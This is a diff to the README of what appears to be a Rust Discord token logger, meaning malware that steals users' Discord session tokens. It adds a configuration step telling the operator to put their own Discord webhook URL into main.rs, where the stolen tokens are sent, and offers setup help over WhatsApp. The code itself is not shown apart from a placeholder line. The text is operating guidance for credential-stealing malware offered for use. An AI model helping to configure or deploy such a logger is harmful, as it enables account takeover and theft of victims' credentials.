MasterOfBrokenLogic/DiscordTokenLogger/README.md

 ### Configuration

 On line 11 in [main.rs](https://github.com/MasterOfBrokenLogic/DiscordTokenLogger/blob/main/src/main.rs) , replace the variable with your webhook URL from Discord.
+If you're unsure about what a Webhook URL is or how to obtain one, feel free to reach out to me on WhatsApp for assistance.
+I'm here to help, my friend!

 ```rust
 let url = "Discord Webhook URL";